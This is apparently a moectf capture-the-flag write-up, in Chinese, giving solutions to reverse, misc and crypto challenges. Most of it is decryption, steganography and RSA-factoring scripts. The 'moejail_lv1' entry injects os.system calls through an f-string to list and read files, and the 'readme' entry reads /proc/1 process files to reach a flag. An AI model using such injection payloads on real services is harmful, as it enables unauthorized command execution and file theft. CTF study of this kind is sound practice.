    total = (delta * rounds) & mask
    for _ in range(rounds):
        right = (right - (((left << 4) + k2) ^ (left + total) ^ ((left >> 5) + k3))) & mask
        left = (left - (((right << 4) + k0) ^ (right + total) ^ ((right >> 5) + k1))) & mask
        total = (total - delta) & mask
    return [left, right]
def decode(v):
    """Decrypt one block twice with the fixed key and print it as text.

    Each decrypted word is converted with ``long_to_bytes`` and reversed, which
    gives little-endian byte order. ``long_to_bytes`` drops leading zero bytes,
    so a word whose high byte is zero prints fewer than four characters.
    """
    key = [114514, 1919810, 415144, 19883]
    # The binary encrypts every block twice, so two decrypt passes are needed.
    for _ in range(2):
        v = decrypt(v, key)
    first_half = long_to_bytes(v[0])[::-1]
    second_half = long_to_bytes(v[1])[::-1]
    print((first_half + second_half).decode())
if __name__ == '__main__':
    # Ciphertext, one [v0, v1] pair per 64-bit block.
    blocks = [
        [1397140385, 2386659843],
        [962571399, 3942687964],
        [3691974192, 863943258],
        [216887638, 3212824238],
        [3802077983, 1839161422],
        [1288683919, 3222915626],
    ]
    for block in blocks:
        decode(block)
Misc
罗小黑
moectf{y0uu6r3th3m0st3r1nth1sf13ld}
gif 二维码
ezF5
java Extract lopez.jpg -p no_password
moectf{F5_15_s0_lntere5t1n9}
ctfer2077①
zsteg -a qrcode.png
moectf{84d7f247-3cba-4077-ba25-079f3ac7bb8a}
boss rabbit
文件头修复为FFD8 看到 {Welc0me_t0_the_sec
010查看找到 key???cmV0X2xpZmVfMGZfTWlzYyE=
删问号解出来为 ret_life_0f_Misc!
moectf{Welc0me_t0_the_secret_life_0f_Misc!}
解不完的压缩包
脚本解出最后的zip文件.
cccccccrc.zip 进行crc32爆破 pwd1-4按顺序拼接为解压密码
moectf{af9c688e-e0b9-4900-879c-672b44c550ea}
moejail_lv1
f'{__import__("os").system("ls -a /tmp")}'
f'{__import__("os").system("cat /tmp/.t*")}'
The upside and down
16进制反转是个二维码png 89 50 4E 47
moectf{Fri3nds_d0n't_lie!}
readme
/proc/1/cmdline 查看源码
/proc/1/fd/3 查看读取flag文件的对象
每人至少300份
127236589
127236592 忘了是哪个数字拼的 , 拼图解码得到
balabalballablblablbalablbalballbase58lblblblblllblblblblbalblbdjshjshduieyrfdrpieuufghdjhgfjhdsgfsjhdgfhjdsghjgfdshjgfhjdgfhgdh///key{3FgQG9ZFteHzw7W42}??
上面有个base58.
把 3FgQG9ZFteHzw7W42 用base58解出得到 we1rd_qrc0d3
moectf{we1rd_qrc0d3}
捂住一只耳
63 31 43 31 41 52 31 51 71 101
没出来flag moectf{MOECTF_63_31_43_31_41_52_31_51_71_101}不对
键盘上描绘出独属于字母的坐标图QAQ 快去试试吧!
moectf{NEVERGETUP}
findit
moectf{ji_di_bao_you_er_yuan}
西安 雄峰 桔子水晶酒店
CRYPT
More_secure_RSA
import gmpy2
from Crypto.Util.number import *
'''
N = n * r
'''
c = 12992001402636687796268040906463852467529970619872166160007439409443075922491126428847990768804065656732371491774347799153093983118784555645908829567829548859716413703103209412482479508343241998746249393768508777622820076455330613128741381912099938105655018512573026861940845244466234378454245880629342180767100764598827416092526417994583641312226881576127632370028945947135323079587274787414572359073029332698851987672702157745794918609888672070493920551556186777642058518490585668611348975669471428437362746100320309846155934102756433753034162932191229328675448044938003423750406476228868496511462133634606503693079
n = 16760451201391024696418913179234861888113832949815649025201341186309388740780898642590379902259593220641452627925947802309781199156988046583854929589247527084026680464342103254634748964055033978328252761138909542146887482496813497896976832003216423447393810177016885992747522928136591835072195940398326424124029565251687167288485208146954678847038593953469848332815562187712001459140478020493313651426887636649268670397448218362549694265319848881027371779537447178555467759075683890711378208297971106626715743420508210599451447691532788685271412002723151323393995544873109062325826624960729007816102008198301645376867
C = 1227033973455439811038965425016278272592822512256148222404772464092642222302372689559402052996223110030680007093325025949747279355588869610656002059632685923872583886766517117583919384724629204452792737574445503481745695471566288752636639781636328540996436873887919128841538555313423836184797745537334236330889208413647074397092468650216303253820651869085588312638684722811238160039030594617522353067149762052873350299600889103069287265886917090425220904041840138118263873905802974197870859876987498993203027783705816687972808545961406313020500064095748870911561417904189058228917692021384088878397661756664374001122513267695267328164638124063984860445614300596622724681078873949436838102653185753255893379061574117715898417467680511056057317389854185497208849779847977169612242457941087161796645858881075586042016211743804958051233958262543770583176092221108309442538853893897999632683991081144231262128099816782478630830512
N = 1582486998399823540384313363363200260039711250093373548450892400684356890467422451159815746483347199068277830442685312502502514973605405506156013209395631708510855837597653498237290013890476973370263029834010665311042146273467094659451409034794827522542915103958741659248650774670557720668659089460310790788084368196624348469099001192897822358856214600885522908210687134137858300443670196386746010492684253036113022895437366747816728740885167967611021884779088402351311559013670949736441410139393856449468509407623330301946032314939458008738468741010360957434872591481558393042769373898724673597908686260890901656655294366875485821714239821243979564573095617073080807533166477233759321906588148907331569823186970816432053078415316559827307902239918504432915818595223579467402557885923581022810437311450172587275470923899187494633883841322542969792396699601487817033616266657366148353065324836976610554682254923012474470450197
e = 65537
# N = n * r, so the extra factor r is recovered by exact division.
r = N // n
# Work modulo r only. phi = r - 1 assumes r is prime, and the result equals the
# message only if the message is smaller than r — TODO confirm against the challenge source.
phi = r - 1
d = gmpy2.invert(e, phi)
m = pow(C % r, d, r)
print(long_to_bytes(m))
指北
rsa
moectf{the_way_to_crypto}
Signin
var('q p')
pq = (p-1)*(q-2) == 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687154230787854196153067547938936776488741864214499155892870610823979739278296501074632962069426593691194105670021035337609896886690049677222778251559566664735419100459953672218523709852732976706321086266274840999100037702428847290063111455101343033924136386513077951516363739936487970952511422443500922412450462
qp = (q-1)*(p-2) == 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687077087914198877794354459669808240133383828356379423767736753506794441545506312066344576298453957064590180141648690226266236642320508613544047037110363523129966437840660693885863331837516125853621802358973786440314619135781324447765480391038912783714312479080029167695447650048419230865326299964671353746764860
p_q = p + q == 279533706577501791569740668595544511920056954944184570513187478007551195831693428589898548339751066551225424790534556602157835468618845221423643972870671556362200734472399328046960316064864571163851111207448753697980178391430044714097464866523838747053135392202848167518870720149808055682621080992998747265496
solve([pq, qp, p_q], p,q)
moectf{Just_4_signin_ch4ll3ng3_for_y0u}'
big and small
flag{xt>is>s>b}
c = 150409620528288093947185249913242033500530715593845912018225648212915478065982806112747164334970339684262757
e = 3
n = 20279309983698966932589436610174513524888616098014944133902125993694471293062261713076591251054086174169670848598415548609375570643330808663804049384020949389856831520202461767497906977295453545771698220639545101966866003886108320987081153619862170206953817850993602202650467676163476075276351519648193219850062278314841385459627485588891326899019745457679891867632849975694274064320723175687748633644074614068978098629566677125696150343248924059801632081514235975357906763251498042129457546586971828204136347260818828746304688911632041538714834683709493303900837361850396599138626509382069186433843547745480160634787
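import time

# Small-exponent search: try c + i*n for i = 0, 1, 2, ... until the value is an
# exact e-th power; that root is the plaintext.
# gmpy2 and libnum must already be imported by the surrounding script.
i = 0
# time.clock() was removed in Python 3.8; perf_counter() is its replacement for timing.
s = time.perf_counter()
while True:
    # iroot returns (integer root, whether the root is exact).
    m, b = gmpy2.iroot(c + i * n, e)
    if b:
        print('[-]m is:', m)
        print('[!]Timer:', round(time.perf_counter() - s, 2), 's')
        print('[!]All Done!')
        # Provincial contest 2023
        print(libnum.n2s(m))
        break
    i += 1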
ezhash
*moectf{*2100360168}
from itertools import product
from hashlib import sha256
# Brute-force the six unknown digits that follow the known prefix "2100" until the
# SHA-256 of the ten-character string matches the target digest.
# NOTE(review): the name `secrets` is the same as the stdlib module's; that module is
# not imported here, so nothing breaks, but the name is easy to misread.
secrets=b'2100'
# Sanity print: digest of the four-character prefix alone.
hash_value = sha256(secrets).hexdigest()
print(hash_value)
# The wider alphabet is overwritten immediately; only digits are searched (10**6 candidates).
cipin = "_flagetoinsrhdcumwypbvkxjqz0123456789FLAGETOINSRHDCUMWYPBVKXJQZ/=+"
cipin='0123456789'
for tp in product(cipin, repeat=6):
# print(tp)
secrets = '2100%s%s%s%s%s%s'% tp
# print(secrets)
# print(len(secrets))
hash_value = sha256(secrets.encode()).hexdigest()
# print(hash_value)
if hash_value== '3a5137149f705e4da1bf6742e62c018e3f7a1784ceebcb0030656a2b42f50b6a':
print(secrets)
print(len(secrets))
# NOTE(review): nothing stops the loop after a match; a `break` here would skip the
# remaining candidates. The page's indentation was lost, so it is unclear whether
# input() ran inside the match branch or once after the loop — it only pauses the console.
input()
baby_equation
moectf{7he_Fund4m3nt4l_th30r3m_0f_4rithm3tic_i5_p0w4rful!}
import gmpy2
from Crypto.Util.number import *
gift=4*0x2227e398fc6ffcf5159863a345df85ba50d6845f8c06747769fee78f598e7cb1bcf875fb9e5a69ddd39da950f21cb49581c3487c29b7c61da0f584c32ea21ce1edda7f09a6e4c3ae3b4c8c12002bb2dfd0951037d3773a216e209900e51c7d78a0066aa9a387b068acbd4fb3168e915f306ba40
# Integer square root of gift; [0] is the root, the exactness flag is ignored.
x_y = gmpy2.iroot(gift,2)[0]
# `divisors` is not imported on this page; presumably SageMath's divisors() — confirm.
div = divisors(x_y)
# Try every divisor i of x_y: one factor minus 1 is the first half of the flag.
for i in div:
flag1 = long_to_bytes(int(i-1)) # the factor is a+1, so subtract 1
# Keep only candidates that look like flag text.
if b'moe' in flag1 or b'flag' in flag1 or b'ctf' in flag1 :
print(flag1)
# NOTE(review): indentation was lost on this page; the two lines below presumably
# belong to the same `if` branch as print(flag1).
flag2 = long_to_bytes(int(x_y//i+1)) # the cofactor is b-1, so add 1; // keeps the division exact (integer)
print(flag2)
大白兔
解同余方程,如N= pq c1 = (2p + 3q)**e1 mod N c2 = (5p + 7*q)**e2 mod N-腾讯云开发者社区-腾讯云 (tencent.com)
import math
import gmpy2
from Crypto.Util.number import long_to_bytes
# Challenge parameters: two auxiliary exponents, the modulus, the two
# auxiliary ciphertexts and the ciphertext of the flag.
e1 = 12886657667389660800780796462970504910193928992888518978200029826975978624718627799215564700096007849924866627154987365059524315097631111242449314835868137
e2 = 12110586673991788415780355139635579057920926864887110308343229256046868242179445444897790171351302575188607117081580121488253540215781625598048021161675697
N = 107840121617107284699019090755767399009554361670188656102287857367092313896799727185137951450003247965287300048132826912467422962758914809476564079425779097585271563973653308788065070590668934509937791637166407147571226702362485442679293305752947015356987589781998813882776841558543311396327103000285832158267
c1 = 15278844009298149463236710060119404122281203585460351155794211733716186259289419248721909282013233358914974167205731639272302971369075321450669419689268407608888816060862821686659088366316321953682936422067632021137937376646898475874811704685412676289281874194427175778134400538795937306359483779509843470045
c2 = 21094604591001258468822028459854756976693597859353651781642590543104398882448014423389799438692388258400734914492082531343013931478752601777032815369293749155925484130072691903725072096643826915317436719353858305966176758359761523170683475946913692317028587403027415142211886317152812178943344234591487108474
c = 21770231043448943684137443679409353766384859347908158264676803189707943062309013723698099073818477179441395009450511276043831958306355425252049047563947202180509717848175083113955255931885159933086221453965914552773593606054520151827862155643433544585058451821992566091775233163599161774796561236063625305050
n = N
e = 65537

# Raise both auxiliary ciphertexts to the common exponent e1*e2 and scale them
# so that their difference is a multiple of one prime factor of n; gcd with n
# then exposes that factor.
# NOTE(review): the cancellation depends on the linear coefficients used by
# the challenge, which this snippet does not show. Confirm against its source.
lhs = pow(c1, e2, n) * pow(2, e1 * e2, n)
rhs = pow(c2, e1, n) * pow(3, e1 * e2, n)
q = math.gcd(n, lhs - rhs)
p = n // q

# Standard RSA decryption once the factors are known.
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(m)
print(long_to_bytes(m).decode())
# moectf{Sh4!!0w_deeb4t0_P01arnova}
ezlegendre
勒让德符号判断离散对数是否有解【算法讲18:二次剩余】勒让德符号 | 欧拉判别法 | Cipolla 算法-CSDN博客
p = 303597842163255391032954159827039706827
a = 34032839867482535877794289018590990371
n = [278121435714344315140568219459348432240, 122382422611852957172920716982592319058, 191849618185577692976529819600455462899, 94093446512724714011050732403953711672, 201558180013426239467911190374373975458, 68492033218601874497788216187574770779, 126947642955989000352009944664122898350, 219437945679126072290321638679586528971, 10408701004947909240690738287845627083, 219535988722666848383982192122753961, 173567637131203826362373646044183699942, 80338874032631996985988465309690317981, 61648326003245372053550369002454592176, 277054378705807456129952597025123788853, 17470857904503332214835106820566514388, 107319431827283329450772973114594535432, 238441423134995169136195506348909981918, 99883768658373018345315220015462465736, 188411315575174906660227928060309276647, 295943321241733900048293164549062087749, 262338278682686249081320491433984960912, 22801563060010960126532333242621361398, 36078000835066266368898887303720772866, 247425961449456125528957438120145449797, 843438089399946244829648514213686381, 134335534828960937622820717215822744145, 74167533116771086420478022805099354924, 249545124784428362766858349552876226287, 37282715721530125580150140869828301122, 196898478251078084893324399909636605522, 238696815190757698227115893728186526132, 299823696269712032566096751491934189084, 36767842703053676220422513310147909442, 281632109692842887259013724387076511623, 205224361514529735350420756653899454354, 129596988754151892987950536398173236050, 97446545236373291551224026108880226180, 14756086145599449889630210375543256004, 286168982698537894139229515711563677530, 100213185917356165383902831965625948491, 268158998117979449824644211372962370753, 264445941122079798432485452672458533870, 87798213581165493463875527911737074678, 131092115794704283915645135973964447801, 164706020771920540681638256590936188046, 178911145710348095185845690896985420147, 154776411353263771717768237918437437524, 260700611701259748940616668959555019434, 222035631087536380654643071679210307962, 
281292430628313502184158157303993732703, 24585161817233257375093541076165757776, 269816384363209013058085915818661743171, 39975571110634682056180877801094873602, 125235869385356820424712474803526156473, 218090799597950517977618266111343968738, 144927096680470512196610409630841999788, 213811208492716237073777701143156745108, 64650890972496600196147221913475681291, 302694535366090904732833802133573214043, 214939649183312746702067838266793720455, 219122905927283854730628133811860801459, 224882607595640234803004206355378578645, 260797062521664439666117613111279885285, 279805661574982797810336125346375782066, 147173814739967617543091047462951522968, 23908277835281045050455945166237585493, 186338363482466926309454195056482648936, 295140548360506354817984847059061185817, 151948366859968493761034274719548683660, 96829048650546562162402357888582895187, 61129603762762161772506800496463804206, 83474322431616849774020088719454672415, 25094865151197136947956010155927090038, 86284568910378075382309315924388555908, 269311313874077441782483719283243368999, 293865655623484061732669067594899514872, 42618744258317592068586041005421369378, 54330626035773013687614797098120791595, 147903584483139198945881545544727290390, 290219451327796902155034830296135328101, 147951591390019765447087623264411247959, 176721307425594106045985172455880551666, 10617017342351249793850566048327751981, 166002147246002788729535202156354835048, 43653265786517886972591512103899543742, 191250321143079662898769478274249620839, 142288830015965036385306900781029447609, 231943053864301712428957240550789860578, 259705854206260213018172677443232515015, 42547692646223561211915772930251024103, 210863755365631055277867177762462471179, 140297326776889591830655052829600610449, 136970598261461830690726521708413303997, 93221970399798040564077738881047391445, 192314170920206027886439562261321846026, 95904582457122325051140875987053990027, 158334009503860664724416914265160737388, 134039922705083767606698907224295596883, 
7789601161004867293103537392246577269, 261069289329878459425835380641261840913, 123743427894205417735664872035238090896, 20126583572929979071576315733108811761, 5317214299018099740195727361345674110, 68965882674411789667953455991785095270, 235934145208367401015357242228361016868, 250709310980093244562698210062174570956, 167048130489822745377277729681835553856, 122439593796334321806299678109589886368, 117953800124952553873241816859976377866, 226311466875372429157352019491582796620, 301401080214561977683439914412806833619, 255816105091394723475431389696875064495, 73243049441397892506665249226961409560, 226985189100195407227032930008331832009, 164462051705780513134747720427967016844, 97905180778488273557095248936896399883, 40737879120410802220891174679005117779, 180413920169781019749877067396006212488, 171309368917976988181007951396904157090, 215065878665354148046787050342635722874, 54225964222741166664978354789209176721, 179980445108969868669560591527220171967, 39118880593034932654127449293138635964, 170210538859699997092506207353260760212, 62152643864232748107111075535730424573, 28285579676042878568229909932560645217, 69823876778445954036922428013285910904, 170371231064701443428318684885998283021, 211884923965526285445904695039560930451, 2912793651373467597058997684762696593, 220544861190999177045275484705781090327, 142755270297166955179253470066788794096, 264271123927382232040584192781810655563, 214901195876112453126242978678182365781, 252916600207311996808457367909175218824, 176399700725319294248909617737135018444, 230677646264271256129104604724615560658, 1568101696521094800575010545520002520, 276644650735844694794889591823343917140, 185355461344975191330786362319126511681, 248497269558037476989199286642120676823, 27426372552503547932146407600438894266, 99885839446999373024614710052031031159, 238693364649026611386487480573211208980, 27047849084544903200283111147329657123, 261687609401872239323715016608713989139, 34926503987070847956303036393611830590, 
252495954285655595492775877967398282722, 249358827602419141539353237669905281246, 42551212101869966935955269842854722856, 286527336123436427709115043975536071462, 158097411156207320921055042509886995091, 40982984899524424348979403377331335675, 87268254405858939730919659372073314983, 142920872841164853694746048293715385493, 280344634952903421792629929689092857993, 203584314487374069738101729666435007339, 76747904284507590577908045394001414841, 18608573158088521401404614102481693137, 104158289118605398449367221892619783009, 182616719368573751169836443225324741716, 272025723760783252166092979911587562064, 24194069309604403496494752448487752613, 71973842397785917741048132725314885345, 281558046604363121112749722271741416764, 66965324704079734796576428718112513855, 105222756356650324548621319241035836840, 331654051401420900830576011369146182, 131087815164777263900650262777429797113, 76104729920151139813274463849368737612, 163253554841934325278065946152769269296, 35973933431510942249046321254376084104, 223355354158871484030430212060934655984, 181704973473887713398031933516341967465, 131391458395622565487686089688656869743, 153029062510158353978320224242258979076, 75598349867958834632866616947240059419, 107656133091853571710502064573530657194, 261653899003034450454605322537555204702, 102387069931966536076616272953425585051, 174654548539988861301269811985320013260, 30731762585661721683653192240732246059, 265493340795853624586170054917042208660, 174818040730242275465453007894471517233, 99514915046145707535310601810631334278, 133978892607644700903700803642408771370, 216019770199630171637325931783378096100, 76687884966028369399497157007109898467, 262185741950606001987209986574269562289, 101935410844521914696784339882721918198, 85956270718878931834010975962772401589, 117578315837774870077915813512746446219, 209811226703488479967593762805568394383, 85782228978690599612110880989543246041, 234993402267259336147096170367513324439, 158487299348452041021565296682698871789, 
159701431055714867184644360639841355076, 109022557288733938098734847159477770521, 20764822884655633017647117775843651332, 144987524936939260617020678038224835887, 214906746504968333094519539609226540495, 61852186870193663367998110214331582115, 90175894032076080713807606548780168998, 283504071501037047650569090140982777586, 267695305479884628857258564337611106120, 2466175482923380874813569827625743835, 62561740902965346823256447383892272796, 181458673990444296212252831090106274182, 151903421483215372136947284355251617709, 19545903652854510304023406921387221130, 219205004027218279279153442572018305650, 62495663621315535552427938857863551873, 12365469869484359722316573851483855865, 84444120685499458796249283893323932282, 240719245204462516267560756675192129462, 27868242791206675092288978266113368469, 231956104988320170956546781095814860314, 238410591787987745803829175586952288627, 290649141309468101840354611586699479851, 288298044918505512172272603794059992911, 43375655853069820305921366762777897508, 195308577786654489057887409352840304641, 184459971400898842809886506207633536394, 255884612697066296714973816950917234211, 8695922085804648269560669225439485137, 109407350389195091443836128149623969417, 40151058765649465408124869078260007620, 125484946058191366826510549493690011718, 71132588066103752922321942940739808864, 74434669478187680319595294456652807097, 187368213679294937718535073296853726111, 63461505676143678393259420949793811831, 131619805472714703711458729455838994067, 8579657158619864010437706463902003097, 60626278761876782233388469543817973673, 44776499706241603722632560896220653186, 257249861781237389988455384617803171877, 161899873165011719282095749671993720527, 73303482092538159761390536102771615311, 141674253732456103774983358188317473860, 112299149158347774069079224861237069975, 192409969047313867540459549167233638120, 52560717143548208264188844553309600513, 209294007943747095607573416682772182613, 65285862009539442533024037477398617382, 
141465096635701758351979378177631042196, 282970656853503001128091562858564344839, 50475483578642585644452991078499278745, 162546597698227455939743094437394415689, 65258447920153625609456176138520078583, 25184730952052088803921023041299838584, 228883100940853988548836641050823478387, 234342509561041384559923481191578502671, 96929129863331626375704681481278825323, 288533470498072097357398960101692503873, 202238020435442160571930572760188491021, 179010548891454398845389500871076122861, 210509821764943794358893224681677583929, 301357944197101288505771002301759006254, 188933290023352627523422420332593360537, 207946655777875200521742190622482472884, 288626263488145443150622420747070805416, 75616301779108425588545170038742534166, 58163857263381687168244101022135667109, 297006021514663344215599115965804102114, 297690420826548736122127126645053452341, 88307045391242971429880119414942510712, 186427606153958359494215188169120285788, 135488686276533521058776859854524444361, 185380054960856211260651416683468161990, 175033658667416561573078028845860911744, 223026004671602541191897755812121342354, 34657268786986063209312902409995458857, 120560332690000675303295481174067849230, 55304621833927249516093996383526467671, 111480233798478730015825495041130765708, 188996716801525995463705449722399676888, 276300230605454487705048192796463035731, 195951365841304132244984630163178946841, 97383655947416522972353051984313703380, 94486945760999630041197414137963583839, 180706938513681126017333618518691884990, 291355503207799224380050183085704824037, 69034413486375685936282884707402207337, 147750870458026934714106830614187010708, 45030500748522416863096615057804736553, 242760053973560804002707125041520857401, 78549841097746795170488790352479728712, 2356186555504071026416878904180857750, 250486437623828232647064146324392061051, 23443836455198610186212360005846025976, 174557226633145985326629017377610499133, 105578481831185315088267357915446186040, 275620780071666328887795273613981325091, 
23435505408737317601794562472269448966, 153209223406380813663608757935808571040, 298537417505667302508269715871007454162, 203833907122687718347615710181705388877, 41923370405573382737900061813058979798, 3762696947926387653032627637114050038, 201362054098012734707571348865729525585, 285561801443127226417656620776228615886, 111526376057659222252771678197929357387, 203857473647840873587593099562928738804, 44500972779851392967974092230683443589, 131565609415497588649207556985146740667, 118140388348838985266223643241117982200, 151449885527204880099343472664885565851, 296392921256617994387220911796693904909, 171323803851876663161606688343678019752, 77152982746512263077542395226111426871, 71648764903315646849225859605038798241, 204032734481806785543119754456569617316, 6308687907566364067313782129902290691, 16601010504475415688487155708691097587, 267844409827567109183739120606590016153, 8224746302136608660764206696943998066, 66759882079234093195284745682061177129, 246382951504754280882643835151081337286, 255668159720160142170457715248631352728, 198682585307670767869381177003851088434, 52435298055396076040371814840062860322, 71487031168170283085378067681578926209, 19270201008106231446848331516948751837, 259975200953378762173082382130139147342, 100957428421542421187997144087873975651, 208596806512779765020431672051552927799, 299145970783704112359526450087000033589, 150947534399996219237186223933189906692, 2048564430495506099844799218948689248, 18962488382754079143174369765373573160, 123031997265327646442638576943887737076, 244982544573374061178705105734141424990, 146410849043938910996544914770892579969, 223289253099676841267315311685506771609, 51374350072145272462874563304717832675, 11071799523780604861063183113721965515, 64879815349665030137608387728274669513, 80407660651138778640313857555610913997, 303240361297474032656368918727922343524, 103535171867293830164396688627880762056, 80560992291681297484967629700766125368, 143230791823232014720768325847406122476, 
188716605362804777650654549500430035344, 232870220205325961834389425482865329315, 283584919111555062850512413920721407255, 206566027046056486360456937040463884619, 157265544558229360994066706355140059167, 234540100059557817987307855523008271441, 145080729935010940836509908225154438654, 87632901547252991486640361323948527297, 132851295075144433057295220850764336697, 119332580967710872282556206817561230364, 252662535367310697404410284791596079390, 116953597995893914045234747272641030589, 100249498080127826743176896590140549012, 136127222991007877469608037092253387587, 293872159333237281344632727438901916796, 188380258232793584033919525452891729603, 1610116068556601814921533488550773010, 227538093179017809788576278302184723209, 96083211912155805281570727244009758189, 177565192075026414675108774674272650977, 48610376097473152433617435307712235835, 247706157308906487216795222963091222950, 158089460554439410339817265377357657075, 242596743543458727108836420358578527964, 157838486547678450498998359338995593594, 154936428786673098370270244313756793764, 230069001282099253337070315838992422706, 302203905412042965194022309363722872023, 278925578180003228386990239779184911424, 2121847168422140085785053284950978779, 88186566913792352545205577594300112005, 127051055548524716972172930848069016819, 216775577660712694343189516378309335187, 44934779747684486400910901018161470888, 32429597712898788634301884219187226083, 219683174528279300995710495669083670544, 37001671152735870067433052249003677244, 40408367335919429215031155701333780256, 156957056705864208022145617831060134907, 180077610045061934161783737112285900966, 59357544819520045255625797086421901884, 77751400794807935281264495346525107329, 4517615764752715802675887411287287137, 76319782726782483955139757169428276003, 176009402215469456144386392247781430661, 283055695252017869386094188584670242363, 20001716567499724882317501875143788088, 125228382132280749989067609697418628387, 144053090751393640875176862167012247830, 
15289106046221987660093620422889539867, 111243866573605033251079958638430165633, 169264885994758018612038619809803723688, 11895954311759483419234457833286931577, 273147053963507607445612310063799123998, 158981773284803069491507978382595811562, 41293513794446810141896116395025053234, 57441237860743029006005815967510568612, 109171476551418034153338841133917497633, 136539712287056106151501004438585146777, 278918550892367788720071091355436733468, 211360251223022250021398148918837686812, 254351242496347083009146404917085951637, 130260153203964833202474997491055897705, 221930288825889900517852991745469270910, 66354211799382156899053592476719001842, 127898620670768976254134750731374490934, 298131830425274848646460016809595859328, 132109510144911727511061804395381822418, 210917766469026421985352121201196497206, 5441137715689271309917542693016936841, 209516950406881264617228336887254107528, 92275151703152148383106907311559718841, 46255650973652148247469464088017660080, 182628529221607295465655096378164148336, 52574278547120304143820897608762444985, 63698472804719856407197390836793525437, 30457182690865024857724004613999433676, 212073418196280214618461610817423630022, 48875930775858981513092672396243080640, 113234797533868946026347891158142991388, 256534108458875318962058222544020064164, 22522715662428558833985333846937440705, 97553118958308509177643330175409499003, 197088081433425221073434635573357125592, 157303116668734020456228309942188293059, 110316346669278795114546305726864504681, 228887397917708007004920589862367347873, 112210930213921962308944716344585917343, 95017760786235266842788931502689331157, 303479014347753799316861720146531596843, 138677197920058856282155251074088437081, 285912176726299387362893467150449209426, 120309832759140713296686339140142433386, 279125897926861811239250830750932241600, 289502053647872994218190050825294169535, 262459212837236162171047720358005836712, 290390838897912466575239533978002826151, 292988850197951752250595007039860868400, 
34796135808311610468205608686622819504, 25206338413385638687826160218013868658, 42180804482932648992176529097078580055, 195897225052351816559125785179252565465, 290060760535408066224831756224248708027, 34243626514368402883316460494646065629, 159497726968729366867935528734367549832, 267785772871046662107247674801793846921, 47342328853090920958565777290912999560, 194980176549393239742230551297786993434, 88020247887557921707284362381274951852, 255474100333005567974457204812640809071, 93324791124684170744053910877870176609, 69542826141091170218040988642070014011, 188678529221313094426441439309063681864, 56030802691247887446204447769438570825, 74312207153349149422500961216106557393, 153811406554673020809393530896156460494, 130232956128662318657579623819323546361, 241587755919930468705435097001858194189, 150548598672513907492388638742866339038, 38780469811591978249139697733603217652, 237554030153815380781978075720171312418, 96541634878634946114738393982914693394, 83284071476491638125716901346418260661, 277535192833115492238855935055373371297, 92291115416977028401374199691398676627, 105634075531674200869064066234662065605, 59669321288506854711632528171527160495, 24913178886798791108798737682436779604, 191902245938756063865405758957515936934, 200833770402179506644143905670947994664, 249327029439265065126080906281744759655, 2368715218056973901783211260781833927, 133209645820509536502329231321782644514, 170083361139958757944996287868734988169, 143242266754832252556264383809361085258, 198438133508477313319510861550461456953, 226416574016152349355240811564666677855, 131995850810926550122710727062184985075, 206211971624338783828953817981719254101, 95022339713176475801874420969255633409, 39239785273544046574575511790952158726, 6761950061835300419279903725369635970, 160849355761964483498641169767552240859, 44129081383649229398785011378026849128, 116611486899507912253396257166983831123, 102748760887182142877957834312659347601, 100973668783270797012352094429175531207, 
110548564207426762905750742091610942634, 205424582078496700107783237952155124442, 210932790939110827079725957948996247757, 54413304958149902897514912130730392489, 181315803651356180100745517014898850424, 183346938138867395962624263310328788228, 133507835720650939452036529283981720094, 244220649646693249242542702657146329679, 111814540087048948955999016117121133729, 210757262617434713384638061648414714521, 31712005436857719771604404352654183712, 299210790483067037892753875410776716305, 34216439939230284515095120240039231491, 246820219620854547856488049434101568744, 298588211282375015522910461809769779222, 53320103067319149790078933423751044737, 164977173816081040725650999609390274279, 234782977255751828939911143180631329578, 61521250269407451751766565186333346163, 119529895182262920689181379893081203421, 154588465395872896210615516764102943961, 153034255402211966905777978896125271527, 65497510688725487475002809757533544579, 76824114145168270682129892469858568031, 218064880554787781811938382300930885801, 196850060586188141836799779247809406205, 176023892018381269394229104598502170110, 32491776807255207889633110137157036238, 41150198830446315717651890670848632754, 260753023840843193587871227195221789744, 48345408122882987831052823644867513356, 80045935233531979816083287928071697883, 131878104259519592871955471048058374000, 15534379538690707223440448056318568055, 131291412522855581131329717355299310716, 37018675243998552749630837151597269431, 144343493968520204610097930388908478903, 67236444178494959708570043908346657722, 102574100831305499879105427279131095784, 249069309513964056714882166119752611668, 210718130986716991560768592011623825976, 266242407402824082344585571101593909650, 205203132247422842477137158586071965100, 301157372202750742637385626243753030679, 40886620741595313792996852647181029560, 253361171396328884567373946949359324229, 50071128101197582041162516700015376269, 106002417001877546867386840932652850816, 224086864980106045542532841236299648038, 
42103921294151508500634063253613482845, 49777138159264482913170680298952908154, 24324534484842395819609478778764950811, 204106593629836179932302789646808274058, 266707066043760482642609614924857456238, 18723835069315957900598472598907945204, 244338819469013923747256697307964210342, 36296287172854997655950896217230267111, 292888671179451539882069138267865661448, 287111415651274690627399445990831389362, 79940439572496625318602146625920961720, 288270505176661814341807462681727466925, 153921178962139214138689743179633342125, 263564317934507756965522450042219801757, 197993323684501153884855839599466707355, 72143993205715719344183507132882267579, 67511075584002491895239101559049103979, 231396344630318648781207380069016790960, 268490084177254392405211695854127631350, 45968181401712207064942095991325993181, 34472329776995578971329318400545600788, 112967316661320871429337739209994987784, 209508577387521479468956337084132598710, 194445696189141465862938111222574992064, 229942079198360020568341753187100646148, 47944382795398541172186729027517882654, 54806201653083974379270761512143387910, 93457347627015900562505045196097224001, 152033139738914238723733340538181549419, 123719026823969669345162603978875451754, 154704533151410142607151617227929824563, 32428281285686815618553795197210513625, 265229864831280807254743597731258298440, 14904705423314872103792141735779112532, 177442398230615511669857060547212895616, 144918716871520627851549439448066637518, 203019416536984157536348865479415073573, 288452420706913930307744155709559750006, 282516471994395201735206793889605510595, 150722332251745138694381051866105655391, 234504581837296595003379465512031425988, 44178766618576668748878202507789103195, 217129489675072754441642067295058817201, 245087939287551829934600756568137757979, 240954534396950014938672406581264782638]
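def _legendre(x, prime):
    """Return the Legendre symbol (x | prime) as 1, 0 or -1.

    Uses Euler's criterion, x**((prime-1)/2) mod prime, so it needs nothing
    beyond built-in integers. `prime` is assumed to be an odd prime.
    """
    r = pow(x % prime, (prime - 1) // 2, prime)
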